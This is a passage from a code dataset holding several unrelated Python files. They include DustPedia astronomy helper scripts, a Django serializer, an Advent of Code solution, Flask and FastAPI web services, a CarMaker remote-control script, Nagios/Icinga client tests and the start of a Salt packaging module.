signal_path.rsplit('/',1)[1][8:-5]\n else: self.bandname = signal_path.rsplit('/',1)[1][:-5]\n \n error_path = signal_path.rsplit('/',1)[0]+'/ERROR_MAPS/'+signal_path.rsplit('/',1)[-1]\n error_path = error_path.rsplit('.',1)[0]+'_Error.'+error_path.rsplit('.',1)[1]\n try:\n self.errormap = fits.getdata(error_path)\n except:\n self.errormap = 0\n \n def get_pixel_scale(self):\n import numpy as np\n if ('CDELT1' in self.hdr) & ('CDELT2' in self.hdr):\n pixel_scale_x=abs(self.hdr['CDELT1'])\n pixel_scale_y=abs(self.hdr['CDELT2'])\n elif ('CD1_1' in self.hdr) & ('CD1_2' in self.hdr) & \\\n ('CD2_1' in self.hdr) & ('CD2_2' in self.hdr):\n _ = np.arctan(self.hdr['CD2_1']/self.hdr['CD1_1'])\n pixel_scale_x = abs(self.hdr['CD1_1']/np.cos(_))\n pixel_scale_y = abs(self.hdr['CD2_2']/np.cos(_))\n else:\n raise ValueError\n pixel_scale = np.sqrt(pixel_scale_x*pixel_scale_y)\n return pixel_scale\n \n def get_wavelength(self):\n return Wvlghts_dictionary[self.bandname]\n\nclass AngularPhysicalConv:\n \n def __init__(self, z_source, cosmology_name = 'Planck15'):\n if cosmology_name == 'Planck15':\n from astropy.cosmology import Planck15 as cosmo\n elif cosmology_name == 'FlatLambdaCDM':\n from astropy.cosmology import FlatLambdaCDM\n cosmo = FlatLambdaCDM(H0=70 * u.km / u.s / u.Mpc, Tcmb0=2.725 * u.K, Om0=0.3)\n else: raise ValueError('You should give a valid cosmology name.')\n \n self.cosmo = cosmo\n \n from astropy import units as u\n self.z_source = z_source\n\n def P2A(self, physical):\n try: _ = physical.unit\n except: raise ValueError('Physical quantity should have a unit.')\n \n if physical.unit == 'arcsec' or physical.unit == 'arcmin' or physical.unit == 'deg':\n raise ValueError('Give physical quantity, not angular, mona.')\n\n if physical.unit == 'pc': physical = physical.to('kpc')\n elif physical.unit == 'Mpc': physical = physical.to('kpc')\n angular = physical*self.cosmo.arcsec_per_kpc_comoving(self.z_source)\n return angular\n \n def A2P(self, angular):\n try: _ = angular.unit\n except: raise ValueError('Angular quantity should have a unit.')\n \n if angular.unit == 'pc' or angular.unit == 'kpc':\n raise ValueError('Give angular quantity, not physical, mona.')\n \n if angular.unit == 'arcsec': angular = angular.to('arcmin')\n elif angular.unit == 'deg': angular = angular.to('arcmin')\n physical = angular*self.cosmo.kpc_comoving_per_arcmin(self.z_source)\n return physical\n\nclass ManageTable:\n\n def __init__(self, galaxy_name, properties_path, table_path, chisq_threshold = 25):\n import sys\n sys.path.insert(0, '../') # To import Dustpedia Scripts\n sys.path.insert(0, '../scripts/') # To import Dustpedia Scripts\n import DustpediaScripts as DS\n import pandas as pd\n import numpy as np\n from astropy.cosmology import Planck15 as cosmo\n from astropy import units as u\n from astropy.constants import c as v_lux\n\n self.properties_path = properties_path\n self.galaxy_name = galaxy_name \n df = pd.read_csv(properties_path)\n self.properties_table = df.loc[df['objname'] == self.galaxy_name]\n self.ra = self.properties_table['ra2000'].values[0]*u.deg\n self.dec = self.properties_table['de2000'].values[0]*u.deg\n self.t = self.properties_table['t'].values[0]\n self.r25 = .5*self.properties_table['d25'].values[0]*u.arcmin\n self.incl = self.properties_table['incl'].values[0]\n self.dist = self.properties_table['dist_best'].values[0]*u.Mpc\n self.z_source = cosmo.H0*self.dist/v_lux.to('km/s')\n self.r25_physical = cosmo.kpc_comoving_per_arcmin(self.z_source)*self.r25\n\n # Read Pixels Properties\n self.table_path = table_path\n self.table = pd.read_csv(self.table_path, sep = '\\,', dtype={'Id. Aperture': object})\n self.chisq_threshold = chisq_threshold\n self.GOOD_chisq = np.where(self.table.Bestfit_Chisq < self.chisq_threshold)[0]\n self.BAD_chisq = np.where(self.table.Bestfit_Chisq >= self.chisq_threshold)[0]\n\n def update_MSdistance(self, fit_m, fit_q):\n import sys\n sys.path.insert(0, '../') # To import Dustpedia Scripts\n import DustpediaScripts as DS\n import numpy as np\n x, y = np.log10(self.table.SigmaMstar), np.log10(self.table.SigmaSFR)\n self.table['MS_distance'] = DS.shortest_distance(x, y, fit_m, fit_q)\n return\n\n def update_MSdistance(self, fit_m, fit_q):\n import sys\n sys.path.insert(0, '../') # To import Dustpedia Scripts\n import DustpediaScripts as DS\n import numpy as np\n x, y = np.log10(self.table.SigmaMstar), np.log10(self.table.SigmaSFR)\n self.table['MS_distance'] = DS.shortest_distance(x, y, fit_m, fit_q)\n return\n \n def update_MSdistance_ODR(self, fit_m, fit_q):\n import sys\n sys.path.insert(0, '../') # To import Dustpedia Scripts\n import DustpediaScripts as DS\n import numpy as np\n x, y = np.log10(self.table.SigmaMstar), np.log10(self.table.SigmaSFR)\n self.table['MS_distance_ODR'] = DS.shortest_distance(x, y, fit_m, fit_q)\n return\n \n def update_autoMSdistance(self, logSFR_limit = False):\n import sys\n sys.path.insert(0, '../') # To import Dustpedia Scripts\n import DustpediaScripts as DS\n import numpy as np\n from scipy import odr\n linear = odr.Model(DS.linear_function)\n x, y = np.log10(self.table.SigmaMstar[self.GOOD_chisq]), np.log10(self.table.SigmaSFR[self.GOOD_chisq])\n if logSFR_limit != False:\n ok = np.where(y >= logSFR_limit)\n x, y = x[ok], y[ok]\n\n MYodr = odr.ODR(odr.RealData(x, y), linear, beta0=[1,1])\n MYresults = MYodr.run()\n x, y = np.log10(self.table.SigmaMstar), np.log10(self.table.SigmaSFR)\n self.table['autoMS_distance'] = DS.shortest_distance(x, y, MYresults.beta[0], MYresults.beta[1])\n return MYresults.beta[0], MYresults.beta[1]\n \n def save_table(self, save_table_path, update = False):\n import pandas as pd\n import numpy as np\n if update == True: self.table.to_csv(self.table_path, index = False, sep = ',')\n else: self.table.to_csv(save_table_path, index = False, sep = ',')\n return\n \n def apply_M51b_mask(self):\n import numpy as np\n from astropy import units as u\n BAD_5194 = np.where(self.dec > 47.24052*u.deg)\n self.table.bestfit_chisq[BAD_5194] = 50\n self.GOOD_chisq = np.where(self.table.Bestfit_Chisq < self.chisq_threshold)\n self.BAD_chisq = np.where(self.table.Bestfit_Chisq >= self.chisq_threshold)\n return\n\n def apply_radius_threshold(self, radius_threshold):\n import numpy as np\n from astropy import units as u\n BAD = np.where(self.table.cendist_physical > radius_threshold.value)\n self.table.bestfit_chisq[BAD] = 100\n self.GOOD_chisq = np.where(self.table.Bestfit_Chisq < self.chisq_threshold)\n self.BAD_chisq = np.where(self.table.Bestfit_Chisq >= self.chisq_threshold)\n return\n \nimport numpy as np\nimport os, subprocess\n\ndef band_disambiguation(band):\n if band == 'GALEX_FUV' or band == 'GALEX FUV': return 'GALEXFUV'\n if band == 'GALEX_NUV' or band == 'GALEX NUV': return 'GALEXNUV'\n if band == 'SDSS u' or band == 'Sloan u': return 'SDSS_u'\n if band == 'SDSS g' or band == 'Sloan g': return 'SDSS_g'\n if band == 'SDSS r' or band == 'Sloan r': return 'SDSS_r'\n if band == 'SDSS i' or band == 'Sloan i': return 'SDSS_i'\n if band == 'SDSS z' or band == 'Sloan z': return 'SDSS_z'\n if band == '2MASS_J' or band == '2MASS J': return 'J'\n if band == '2MASS_H' or band == '2MASS H': return 'H'\n if band == '2MASS_Ks' or band == '2MASS Ks' or band == '2MASS K': return 'Ks'\n if band == 'WISE_3.4' or band == 'WISE 3.4': return 'WISEW1'\n if band == 'WISE_4.6' or band == 'WISE 4.6': return 'WISEW2'\n if band == 'WISE_12' or band == 'WISE 12': return 'WISEW3'\n if band == 'WISE_22' or band == 'WISE 22': return 'WISEW4'\n if band == 'Spitzer_3.6' or band == 'Spitzer 3.6': return 'IRAC1'\n if band == 'Spitzer_4.5' or band == 'Spitzer 4.5': return 'IRAC2'\n if band == 'Spitzer_5.8' or band == 'Spitzer 5.8': return 'IRAC3'\n if band == 'Spitzer_8.0' or band == 'Spitzer 8.0': return 'IRAC4'\n if band == 'Spitzer_24' or band == 'Spitzer 24': return 'MIPS24'\n if band == 'Spitzer_70' or band == 'Spitzer 70': return 'MIPS70'\n if band == 'Spitzer_160' or band == 'Spitzer 160': return 'MIPS160'\n if band == 'PACS_70' or band == 'PACS 70': return 'PACS70'\n if band == 'PACS_100' or band == 'PACS 100': return 'PACS100'\n if band == 'PACS_160' or band == 'PACS 160': return 'PACS160'\n if band == 'SPIRE_250' or band == 'SPIRE 250': return 'SPIRE250'\n if band == 'SPIRE_350' or band == 'SPIRE 350': return 'SPIRE350'\n if band == 'SPIRE_500' or band == 'SPIRE 500': return 'SPIRE500'\n if band == 'SMA' or band == 'SMA_800': return 'SMA800'\n return band\n\ndef associate_colormap(band):\n from matplotlib import cm\n band = band_disambiguation(band)\n if band == 'GALEXFUV' or band == 'GALEXNUV': return cm.bone\n if band == 'SDSS_u' or band == 'SDSS_g' or band == 'SDSS_r' \\\n or band == 'SDSS_i' or band == 'SDSS_z': return cm.gray\n if band == 'J' or band == 'H' or band == 'Ks': return cm.gray\n if band == 'WISEW1' or band == 'WISEW2' \\\n or band == 'IRAC1' or band == 'IRAC2' \\\n or band == 'IRAC3' or band == 'IRAC4': return cm.pink\n if band == 'WISEW3' or band == 'WISEW4' \\\n or band == 'MIPS24': return cm.Reds\n if band == 'MIPS70' or band == 'PACS70' or band == 'PACS100' \\\n or band == 'PACS160' or band == 'MIPS160' or band == 'SPIRE250' \\\n or band == 'SPIRE350' or band == 'SPIRE500': return cm.gist_heat\n\ndef round_sig(x, sig = 2):\n try: return round(x, sig-((np.floor(np.log10(abs(x))))-1).astype('int'))\n except: return np.round(x, sig)\n\ndef round_arr(x, sig = 2):\n return np.array([round_sig(el, sig) for el in x])\n\ndef linear_function(B, x):\n '''\n Linear function y = m*x + b\n '''\n # B is a vector of the parameters.\n # x is an array of the current x values.\n # x is in the same format as the x passed to Data or RealData.\n #\n # Return an array in the same format as y passed to Data or RealData.\n return B[0]*x + B[1]\n\ndef pairwise(iterable):\n from itertools import izip\n \"s -> (s0, s1), (s2, s3), (s4, s5), ...\"\n a = iter(iterable)\n return izip(a, a)\n\ndef download_data(galaxy_name, bands_to_download, download_directory, processes = 10):\n from itertools import repeat\n import multiprocessing\n subprocess.call('mkdir '+download_directory.split('/')[0], shell = True)\n subprocess.call('mkdir '+download_directory.split('/')[0]+'/'+download_directory.split('/')[1], shell = True)\n actual_path = os.getcwd()\n os.chdir(download_directory)\n pool = multiprocessing.Pool()\n with multiprocessing.Pool(processes=processes) as pool:\n func = zip(bands_to_download, repeat(galaxy_name))\n pool.starmap(parallel_download, func)\n os.chdir(actual_path)\n return 'All maps have been stored in ' + download_directory\n\ndef parallel_download(band, galaxy_name):\n instrument = str(band.split('_', 1)[0])\n if instrument == 'Spitzer':\n link_path = ' \"http://dustpedia.astro.noa.gr/Data/GetImage?imageName='+galaxy_name+'_'+band+'.fits.gz&instrument='+instrument+'\"'\n command = 'wget -cO -'+link_path+' > '+galaxy_name+'_'+band+'.fits.gz'\n subprocess.call(command, shell = True)\n subprocess.call('gunzip '+galaxy_name+'_'+band+'.fits.gz', shell = True)\n else:\n link_path = ' \"http://dustpedia.astro.noa.gr/Data/GetImage?imageName='+galaxy_name+'_'+band+'.fits&instrument='+instrument+'\"'\n command = 'wget -cO -'+link_path+' > '+galaxy_name+'_'+band+'.fits'\n subprocess.call(command, shell = True)\n print('Downloaded '+galaxy_name+'_'+band)\n return\n\ndef download_data_errors(galaxy_name, bands_to_download, download_directory):\n # Sono poche, pesano una sega, non c'è bisogno di ||.\n subprocess.call('mkdir '+download_directory.split('/')[0], shell = True)\n subprocess.call('mkdir '+download_directory.split('/')[0]+'/'+download_directory.split('/')[1], shell = True)\n actual_path = os.getcwd()\n os.chdir(download_directory)\n for band in bands_to_download:\n instrument = str(band.split('_', 1)[0])\n if instrument == 'Spitzer':\n link_path = ' \"http://dustpedia.astro.noa.gr/Data/GetImage?imageName='+galaxy_name+'_'+band+'_Error.fits.gz&instrument='+instrument+'\"'\n command = 'wget -cO -'+link_path+' > '+band+'_Error.fits.gz'\n else:\n link_path = ' \"http://dustpedia.astro.noa.gr/Data/GetImage?imageName='+galaxy_name+'_'+band+'_Error.fits&instrument='+instrument+'\"'\n command = 'wget -cO -'+link_path+' > '+band+'_Error.fits'\n print('Downloading '+galaxy_name+'_'+band+' error map.')\n subprocess.call(command, shell = True)\n os.chdir(actual_path)\n return 'All error maps have been stored in '+download_directory\n \ndef run_CAAPR(galaxy_name):\n actual_path = os.getcwd()\n os.chdir('Caapr')\n subprocess.call('python Caapr_'+galaxy_name[3:]+'.py', shell = True)\n os.chdir(actual_path)\n return 'Done!'\n \n# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n# QUI STO COPIANDO DA CHRIS CLARK\n# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n\ndef Downsample(myarr, factor, estimator=np.nanmean):\n '''\n Keflavich function to downsample an array\n Args: Array to downsample, downsampling factor, and estiamtor\n Returns: Downsampled array\n '''\n ys,xs = myarr.shape\n crarr = myarr[:ys-(ys % int(factor)),:xs-(xs % int(factor))]\n dsarr = estimator( np.concatenate([[crarr[i::factor,j::factor]\n for i in range(factor)]\n for j in range(factor)]), axis=0)\n return dsarr\n\ndef SigmaClip(values, tolerance=0.001, median=False, sigma_thresh=3.0, no_zeros=False):\n '''\n Function to perform a sigma clip upon a set of values\n Args: Array of values, convergence tolerance, state if median instead of mean should be used for clip centrepoint,\n clipping threshold, boolean for whether sigma of zero can be accepted\n Returns: List containing the clipped standard deviation, the average, and the values themselves\n\n '''\n # Remove NaNs from input values\n values = np.array(values)\n values = values[ np.where(np.isnan(values)==False) ]\n values_original = np.copy(values)\n\n # Continue loop until result converges\n diff = 10E10\n while diff>tolerance:\n\n # Assess current input iteration\n if median == False:\n average = np.mean(values)\n elif median == True:\n average = np.median(values)\n sigma_old = np.std(values)\n\n # Mask those pixels that lie more than 3 stdev away from mean\n check = np.zeros([len(values)])\n check[ np.where( values>(average+(sigma_thresh*sigma_old)) ) ] = 1\n check[ np.where( values<(average-(sigma_thresh*sigma_old)) ) ] = 1\n values = values[ np.where(check<1) ]\n\n # Re-measure sigma and test for convergence\n sigma_new = np.std(values)\n diff = abs(sigma_old-sigma_new) / sigma_old\n\n # Perform final mask\n check = np.zeros([len(values)])\n check[ np.where( values>(average+(sigma_thresh*sigma_old)) ) ] = 1\n check[ np.where( values<(average-(sigma_thresh*sigma_old)) ) ] = 1\n values = values[ np.where(check<1) ]\n\n # If required, check if calculated sigma is zero\n if no_zeros==True:\n if sigma_new==0.0:\n sigma_new = np.std(values_original)\n if median==False:\n average = np.mean(values)\n elif median==True:\n average = np.median(values)\n\n # Return results\n return [sigma_new, average, values]\n\ndef LogError(value, error):\n '''\n # New function to convert an uncertainty to log space\n # Args: Value, uncertainty\n # Returns: Logarithmic uncertainty (up, down, and mean bw up and down)\n '''\n value, error = np.array(value), np.array(error)\n frac = 1.0 + (error/value)\n error_up = value * frac\n error_down = value / frac\n log_error_up = np.abs( np.log10(error_up) - np.log10(value) )\n log_error_down = np.abs( np.log10(value) - np.log10(error_down) )\n return log_error_up, log_error_down, 0.5*(log_error_up+log_error_down)\n\ndef Most_Common(lst):\n from collections import Counter\n data = Counter(lst)\n return data.most_common(1)[0][0]\n\n######\n\ndef old_download_data(galaxy_name, bands_to_download, download_directory):\n # Ancora non è parallelizzato.\n subprocess.call('mkdir '+download_directory.split('/')[0], shell = True)\n subprocess.call('mkdir '+download_directory.split('/')[0]+'/'+download_directory.split('/')[1], shell = True)\n actual_path = os.getcwd()\n os.chdir(download_directory)\n for band in bands_to_download:\n instrument = str(band.split('_', 1)[0])\n if instrument == 'Spitzer':\n link_path = ' \"http://dustpedia.astro.noa.gr/Data/GetImage?imageName='+galaxy_name+'_'+band+'.fits.gz&instrument='+instrument+'\"'\n command = 'wget -cO -'+link_path+' > '+galaxy_name+'_'+band+'.fits.gz'\n print('Downloading '+galaxy_name+'_'+band)\n subprocess.call(command, shell = True)\n subprocess.call('gunzip '+galaxy_name+'_'+band+'.fits.gz', shell = True)\n else:\n link_path = ' \"http://dustpedia.astro.noa.gr/Data/GetImage?imageName='+galaxy_name+'_'+band+'.fits&instrument='+instrument+'\"'\n command = 'wget -cO -'+link_path+' > '+galaxy_name+'_'+band+'.fits'\n print('Downloading '+galaxy_name+'_'+band)\n subprocess.call(command, shell = True)\n os.chdir(actual_path)\n return 'Done!'\n","repo_name":"AndreaEnia/InRainbows","sub_path":"DustFolder/scripts/GenericUsefulScripts.py","file_name":"GenericUsefulScripts.py","file_ext":"py","file_size_in_byte":20387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"26482611110","text":"from rest_framework import serializers\nfrom .models import Movie\nfrom genres.serializers import GenreSerializer\nfrom genres.models import Genre\n\n\nclass MovieSerializer(serializers.ModelSerializer):\n genres = GenreSerializer(many=True)\n\n def create(self, validated_data: dict) -> Movie:\n\n request_genres = validated_data.pop('genres')\n movie = Movie.objects.create(**validated_data)\n for genre in request_genres:\n genre_request, _ = Genre.objects.get_or_create(**genre)\n movie.genres.add(genre_request)\n return movie\n\n class Meta:\n model = Movie\n fields = [\n \"id\",\n \"title\",\n \"duration\",\n \"premiere\",\n \"budget\",\n \"overview\",\n 'genres'\n ]\n","repo_name":"jorgekimura2001/projeto-kmdb","sub_path":"movies/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"8758402855","text":"q = [int(line.rstrip()) for line in open(\"day9_input.txt\")]\n\npreambleSize = 25\ndef findNumber(preAmble, q):\n for idx, value in enumerate(q[preAmble:]):\n searchDict = {el:1 for el in q[idx:idx+preAmble]}\n found = False\n for key in searchDict:\n if value - key in searchDict:\n found = True\n break\n if found == False:\n return(value)\n \ntarget = findNumber(preambleSize, q)\n\ncontigIndex = 0\ncontigLength = 0\n\nfor idx,value in enumerate(q):\n contigSum = 0\n iterator = 0\n while(contigSum < target):\n contigSum += q[idx+iterator]\n iterator +=1\n if contigSum == target and iterator > contigLength:\n contigIndex = idx\n contigLength = iterator\n\nsubQ = q[contigIndex:contigIndex+contigLength-1]\n\nprint(\"For part1 answer: \" + str(target) + \" the longest contig of length: \" + str(contigLength) + \" is found at index: \" + str(contigIndex))\nprint(\"So the part2 answer is: \" + str(min(subQ)) + \" + \" + str(max(subQ)) + \" = \" + str(min(subQ)+max(subQ)))","repo_name":"TijmenK/AoC2020","sub_path":"day09.py","file_name":"day09.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"28359111782","text":"from flask import Flask, render_template, request\nimport numpy as np\nimport backtest_webapp\nimport sys\nimport stock_data_webapp\n\napp = Flask(__name__)\n\n@app.route('/', methods=['GET', 'POST'])\ndef main():\n return render_template(\"main.html\")\n\n@app.route('/graphs', methods=['GET', 'POST'])\ndef graphs():\n\n\n args = request.form.to_dict('company')\n\n alpha_API = stock_data_webapp\n stock_df, SYMBOL = alpha_API.get_data(args['company'])\n\n short_window = int(args['short_window'])\n long_window = int(args['long_window'])\n initial_capital = float(args['initial_capital'])\n\n\n app_obj = backtest_webapp\n\n \n n = stock_df.shape[0]\n\n train_start = 0\n train_end = int(np.floor(0.8*n))\n test_start = train_end\n test_end = n\n\n\n graph1_url = app_obj.plot_stock_prices(stock_df, SYMBOL)\n graph2_url = app_obj.arima_plots(stock_df, SYMBOL, train_end, test_end)\n graph3_url, graph4_url, graph5_url, graph6_url = app_obj.lstm_plots(stock_df, SYMBOL, train_start, train_end, test_start, test_end, short_window, long_window, initial_capital)\n \n return render_template('graphs.html',\n graph1=graph1_url,\n graph2=graph2_url,\n graph3=graph3_url,\n graph4=graph4_url,\n graph5=graph5_url,\n graph6=graph6_url)\n \nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0', port=80)\n\n","repo_name":"skhan1020/Backtesting-using-AI-in-Algorithmic-Trading","sub_path":"webapp/flask_app.py","file_name":"flask_app.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"19870515499","text":"\nimport fastapi\nfrom fastapi.responses import PlainTextResponse,JSONResponse\nimport os\nfrom src.emailfunctions import EmailFunctions\nfrom src.alertmanagerfunctions import AlertManagerFuncs\nimport logging\n\n\nrouter = fastapi.APIRouter()\n\nnumeric_level = getattr(logging, os.getenv('LOG_LEVEL').upper(), 10)\n# Set up logging\nlogging.basicConfig(\n # level=logging[os.getenv('LOG_LEVEL')],\n level=numeric_level,\n format='%(asctime)s %(levelname)s %(module)s:%(lineno)d [RIDE_EMAIL]: %(message)s'\n)\n\nalertmanager_alert_receivers=os.getenv('ALERTMANAGER_DIST_LIST')\nalertmanager_email_templateid=os.getenv('ALERTMANAGER_EMAIL_TEMPLATE_ID')\n\n@router.get('/ping')\nasync def pingmethod():\n return JSONResponse(status_code=200, content={\"status\":\"working\"})\n\n@router.post('/sendbasicemail',response_class=JSONResponse)\nasync def sendbasicemail(payload: dict):\n respstatus = {\"status\": \"failure\"}\n status_code = 500\n try:\n payloadinput = payload.copy()\n templateid=payloadinput['templateid']\n receiver=payloadinput['receiver']\n emailobj=EmailFunctions(os.getenv('GC_API_KEY'),os.getenv('GC_BASE_URL'),logging)\n emailresp=emailobj.sendbasicemail(templateid,receiver)\n if emailresp['status_code']==201:\n respstatus = {\"status\": \"success\",\"resp_id\":emailresp['resp_id']}\n status_code = 200\n else:\n raise Exception(emailresp['err_resp'] )\n except Exception as e:\n print(e)\n respstatus = {\"status\": \"failure\",\"error\":str(e)}\n\n return JSONResponse(status_code=status_code, content=respstatus)\n\n@router.post('/emailpayloadtest',response_class=JSONResponse)\nasync def emailpayloadtest(payload: dict):\n logging.debug(payload)\n respstatus = {\"status\": \"success\"}\n status_code = 200\n return JSONResponse(status_code=status_code, content=respstatus)\n\n@router.post('/alertmanageralerts',response_class=JSONResponse)\nasync def alertmanageralert(payload: dict):\n respstatus = {\"status\": \"failure\"}\n status_code = 500\n try:\n payloadinput = payload.copy()\n templateid = alertmanager_email_templateid\n alertmanagerobj=AlertManagerFuncs(payload,alertmanager_alert_receivers,logging)\n alert_details=alertmanagerobj.parsePayload()\n logging.debug(alert_details)\n emailobj = EmailFunctions(os.getenv('GC_API_KEY'), os.getenv('GC_BASE_URL'), logging)\n emailresp = emailobj.sendalertmanageralert(templateid,alert_details['receiver'],alert_details['subject'],alert_details['message'])\n if emailresp['status_code']==201:\n respstatus = {\"status\": \"success\"}\n status_code = 200\n else:\n raise Exception(emailresp['err_resp'])\n except Exception as e:\n logging.error(e)\n respstatus = {\"status\": \"failure\",\"error\":str(e)}\n return JSONResponse(status_code=status_code, content=respstatus)\n\n","repo_name":"bcgov/rsbc-ride-notification-service","sub_path":"src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"34213194822","text":"# Import the Python libraries (= #include in C)\r\nimport socket\r\nimport time\r\nimport sys, string, os\r\n\r\n# Setting variables\r\n# Path to CM\r\nCM_PATH = \"C:\\\\IPG\\\\carmaker\\\\win64-11.1\\\\bin\\\\CM.exe\"\r\nData_Directory = \"D:\\\\CMProject\\\\CM11\\\\0829test\"\r\n# Computer on which the TCP / IP port is opened\r\nTCP_IP = 'localhost'\r\n# Portnumber\r\nTCP_PORT = 16660\r\nBUFFER_SIZE = 1024\r\n\r\n# \"os.system\" starts a program\r\n# Here: Start of CM.exe with the option -cmdport\r\n# (-> open TCP / IP port on CM side)\r\nos.system(\"%s %s -cmdport %s &\" % (CM_PATH, Data_Directory, TCP_PORT))\r\n\r\n# Wait for CM GUI to start\r\ntime.sleep(2)\r\n\r\n# Open the TCP / IP port in Python\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n# Connect to the CM TCP / IP port 16660 on localhost\r\ns.connect((TCP_IP, TCP_PORT))\r\n\r\n# Send ScriptControl commands over the port\r\n# Several commands per message possible; after each command \\r\r\nMESSAGE = \"LoadTestRun Examples/VehicleDynamics/Braking/Braking\\rStartSim\\r\"\r\ns.send(MESSAGE.encode())\r\n\r\nMESSAGE = \"WaitForStatus running\\r\"\r\ns.sendall(MESSAGE.encode())\r\n\r\nwhile 1:\r\n data = s.recv(BUFFER_SIZE)\r\n if '0' in data.decode():\r\n break\r\n\r\nwhile 1:\r\n MESSAGE = \"DVARead Car.v\\r\"\r\n s.send(MESSAGE.encode())\r\n vel = s.recv(BUFFER_SIZE)\r\n vel = (vel.decode()).strip()\r\n vel = float(vel[1:])\r\n print(vel)\r\n\r\n MESSAGE = \"DVARead Time\\r\"\r\n s.send(MESSAGE.encode())\r\n t = s.recv(BUFFER_SIZE)\r\n t = (t.decode()).strip()\r\n t = float(t[1:])\r\n print(t)\r\n\r\n if vel > 10:\r\n MESSAGE = \"DVAWrite DM.Brake 1 1000\\r\"\r\n s.send(MESSAGE.encode())\r\n s.recv(BUFFER_SIZE)\r\n\r\n if t > 30:\r\n MESSAGE = \"StopSim\\r\"\r\n s.send(MESSAGE.encode())\r\n break\r\n\r\n\r\n# Close the port\r\ns.close()\r\n","repo_name":"DDingR/reference_scripts","sub_path":"remoteGUI/[2] PyCM_example.py","file_name":"[2] PyCM_example.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7162815754","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nUnit tests for Nagios/Icinga 1.x CGI integration\n\"\"\"\n\nfrom __future__ import absolute_import\n\nimport logging\nimport time\nimport pytest\n\nfrom katprep.exceptions import SessionException, UnsupportedRequestException\nfrom katprep.monitoring.nagios import NagiosCGIClient\n\nfrom .utilities import load_config\n\n\n@pytest.fixture(\n params=[\"main\", \"legacy\"],\n ids=[\"Icinga 1\", \"Nagios\"]\n)\ndef nagiosType(request):\n return request.param\n\n\n@pytest.fixture(scope='session')\ndef config():\n return load_config(\"nagios_config.json\")\n\n\n@pytest.fixture\ndef monitoringClient(config, nagiosType):\n try:\n yield NagiosCGIClient(\n logging.ERROR,\n config[nagiosType][\"hostname\"],\n config[nagiosType][\"cgi_user\"],\n config[nagiosType][\"cgi_pass\"],\n verify_ssl=False\n )\n finally:\n time.sleep(8)\n\n\n@pytest.fixture\ndef icingaClient(config):\n try:\n yield NagiosCGIClient(\n logging.ERROR,\n config[\"main\"][\"hostname\"],\n config[\"main\"][\"cgi_user\"],\n config[\"main\"][\"cgi_pass\"],\n verify_ssl=False\n )\n finally:\n time.sleep(8)\n\n\n@pytest.fixture\ndef nagiosClient(config):\n try:\n yield NagiosCGIClient(\n logging.ERROR,\n config[\"legacy\"][\"hostname\"],\n config[\"legacy\"][\"cgi_user\"],\n config[\"legacy\"][\"cgi_pass\"],\n verify_ssl=False\n )\n finally:\n time.sleep(8)\n\n\ndef test_valid_login(monitoringClient):\n \"\"\"\n Ensure exceptions on valid logins\n \"\"\"\n monitoringClient.is_authenticated()\n\n\ndef test_invalid_login(config, nagiosType):\n \"\"\"\n Ensure exceptions on invalid logins\n \"\"\"\n with pytest.raises(SessionException):\n client = NagiosCGIClient(\n logging.ERROR,\n config[nagiosType][\"hostname\"],\n \"giertz\",\n \"paulapinkepank\",\n verify_ssl=False\n )\n client.is_authenticated()\n\n\ndef test_scheduling_downtime_for_host(monitoringClient, config, nagiosType):\n \"\"\"\n Testing downtime scheduling.\n\n Ensure that downtimes can be scheduled, even on ancient systems.\n Ensure that checking downtime is working.\n For Icinga we also ensure that unscheduling downtimes works.\n \"\"\"\n host = config[nagiosType][\"host\"]\n monitoringClient.schedule_downtime(host, \"host\")\n assert monitoringClient.has_downtime(host)\n\n if nagiosType == 'main': # Icinga\n assert monitoringClient.remove_downtime(host)\n else: # Nagios\n with pytest.raises(UnsupportedRequestException):\n # try to remove downtime\n monitoringClient.remove_downtime(\"dummy\")\n\n\ndef test_schedule_downtime_hostgrp(icingaClient, config):\n \"\"\"\n Ensure that scheduling downtimes for hostgroups is working\n \"\"\"\n hostgroup = config[\"main\"][\"hostgroup\"]\n assert icingaClient.schedule_downtime(hostgroup, \"hostgroup\")\n\n\ndef test_get_hosts(monitoringClient, config, nagiosType):\n \"\"\"\n Ensure that receiving hosts is possible\n \"\"\"\n hosts = monitoringClient.get_hosts()\n assert config[nagiosType][\"host\"] in [host['name'] for host in hosts]\n\n\ndef test_get_services(monitoringClient, config, nagiosType):\n \"\"\"\n Ensure that hosts include existing services\n \"\"\"\n services = monitoringClient.get_services(\n config[nagiosType][\"host\"], only_failed=False\n )\n assert config[nagiosType][\"host_service\"] in [service['name'] for service in services]\n assert len(services) == config[nagiosType][\"host_services\"]\n","repo_name":"stdevel/katprep","sub_path":"tests/test_NagiosCompatibleCGIClient.py","file_name":"test_NagiosCompatibleCGIClient.py","file_ext":"py","file_size_in_byte":3620,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"78"} +{"seq_id":"12856189924","text":"\"\"\"\nThese commands are used to build Salt packages.\n\"\"\"\n# pylint: disable=resource-leakage,broad-except,3rd-party-module-not-gated\nfrom __future__ import annotations\n\nimport fnmatch\nimport gzip\nimport hashlib\nimport json\nimport logging\nimport os\nimport pathlib\nimport shutil\nimport sys\nimport tarfile\nimport tempfile\n\nimport yaml\nfrom ptscripts import Context, command_group\n\nimport tools.utils\n\nlog = logging.getLogger(__name__)\n\n# Define the command group\npkg = command_group(name=\"pkg\", help=\"Packaging Related Commands\", 